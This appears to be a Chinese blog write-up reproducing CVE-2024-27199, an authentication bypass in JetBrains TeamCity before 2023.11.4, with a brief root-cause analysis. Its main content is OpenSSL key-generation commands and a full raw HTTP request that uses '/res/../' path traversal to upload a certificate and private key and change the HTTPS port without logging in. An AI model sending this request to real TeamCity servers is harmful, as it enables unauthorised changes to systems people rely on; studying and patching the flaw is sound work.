• CVE-2024-27199 JetBrains TeamCity 身份验证绕过漏洞2

    漏洞简介

    TeamCity Web 服务器中发现了第二个身份验证绕过漏洞。这种身份验证旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置,并泄露服务器上有限数量的敏感信息。

    项目官网下载地址Other Versions - TeamCity

    参考链接:

    影响版本

    < 2023.11.4

    漏洞复现

    1,服务信息泄露

    2.HTTPS 证书上传

    使用 OpenSSL 生成和处理 ECDSA 密钥对和证书

    openssl ecparam -name prime256v1 -genkey -noout -out private-eckey.pem
openssl ec -in private-eckey.pem -pubout -out public-key.pem
openssl req -new -x509 -key private-eckey.pem -out cert.pem -days 360
openssl pkcs8 -topk8 -nocrypt -in private-eckey.pem -out hax.key

    运行上面的命令生成如下文件

    构造如下包,上传HTTPS 证书并设定8443端口

    1. POST /res/../app/https/settings/uploadCertificate HTTP/1.1
    2. Host: 192.168.116.128:8111
    3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4d5hF7eNFFbgJoAC
    4. Content-Length: 1576
    5.  
    6. ------WebKitFormBoundary4d5hF7eNFFbgJoAC
    7. Content-Disposition: form-data; name="certificate"; filename="cert.pem"
    8. Content-Type: application/octet-stream
    9.  
    10. -----BEGIN CERTIFICATE-----
    11. MIICYjCCAgegAwIBAgIUFHRabDe2dTOHNe8at5fDfsigDJwwCgYIKoZIzj0EAwIw
    12. gYUxCzAJBgNVBAYTAmNuMQswCQYDVQQIDAJobjENMAsGA1UEBwwEbmFtZTEQMA4G
    13. A1UECgwHY29tcGFueTESMBAGA1UECwwJdW5pdCBuYW1lMRQwEgYDVQQDDAtjb21t
    14. b24tbmFtZTEeMBwGCSqGSIb3DQEJARYPYWRtaW5AYWRtaW4uY29tMB4XDTI0MDMx
    15. MTA3NTQwN1oXDTI1MDMwNjA3NTQwN1owgYUxCzAJBgNVBAYTAmNuMQswCQYDVQQI
    16. DAJobjENMAsGA1UEBwwEbmFtZTEQMA4GA1UECgwHY29tcGFueTESMBAGA1UECwwJ
    17. dW5pdCBuYW1lMRQwEgYDVQQDDAtjb21tb24tbmFtZTEeMBwGCSqGSIb3DQEJARYP
    18. YWRtaW5AYWRtaW4uY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMJ6RI0Xj
    19. dm72v2AjYl0SGBPAC/TqXHbdSyJSzqDmsH1Du/M8vlBkO1QYnNbcuiqnvEHnfea4
    20. WlDf5a1XnSQBB6NTMFEwHQYDVR0OBBYEFIP5qYGpT7CujDvYGCNtsCiycOmdMB8G
    21. A1UdIwQYMBaAFIP5qYGpT7CujDvYGCNtsCiycOmdMA8GA1UdEwEB/wQFMAMBAf8w
    22. CgYIKoZIzj0EAwIDSQAwRgIhAMcfVmbn711/5hOhnryKro9XH5m77DK/vmBvR0mk
    23. SIYVAiEApXhoDMQiv/0NVbZrOyW+c6oMSlg3CuKtAj6Sd5hxWR0=
    24. -----END CERTIFICATE-----
    25.  
    26. ------WebKitFormBoundary4d5hF7eNFFbgJoAC
    27. Content-Disposition: form-data; name="key"; filename="hax.key"
    28. Content-Type: application/octet-stream
    29.  
    30. -----BEGIN PRIVATE KEY-----
    31. MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgflqLec/N8uvpqGUK
    32. Z7sGvs81dBDffRUw+ufigYq016ChRANCAAQwnpEjReN2bva/YCNiXRIYE8AL9Opc
    33. dt1LIlLOoOawfUO78zy+UGQ7VBic1ty6Kqe8Qed95rhaUN/lrVedJAEH
    34. -----END PRIVATE KEY-----
    35.  
    36. ------WebKitFormBoundary4d5hF7eNFFbgJoAC
    37. Content-Disposition: form-data; name="port"
    38.  
    39. 8443
    40. ------WebKitFormBoundary4d5hF7eNFFbgJoAC--
    41.

    后台验证下证书是否上传

    或者直接访问https://192.168.116.128:8443/

    漏洞分析

    产生漏洞的原因是该系统采用了spring框架,该框架在处理url时遇到url中的../会自行解析再次拼接,这可能会产生某些某些判断机制绕过的现象。其中/res/下的路径不需要认证就可以被服务器去请求,有如下定义

    /app/https/settings/**有如下定义

  • 相关阅读:
    计算机毕业设计Java网上鲜花店网站(源码+系统+mysql数据库+Lw文档)
    o2优化是什么
    导数差分近似公式总结
    双臂二指魔方机器人的制作(三)--还原控制
    手写数组方法之用于遍历的方法
    【打卡】【sysfs相关API详解】21天学习挑战赛—RK3399平台开发入门到精通-Day19
    如何通过cURL库实现远程控制插座
    Maven
    自制操作系统日志——第二十八天(实现中文字符显示)
    【最长递增系列】动态规划法和贪心法
  • 原文地址:https://blog.csdn.net/shelter1234567/article/details/136628215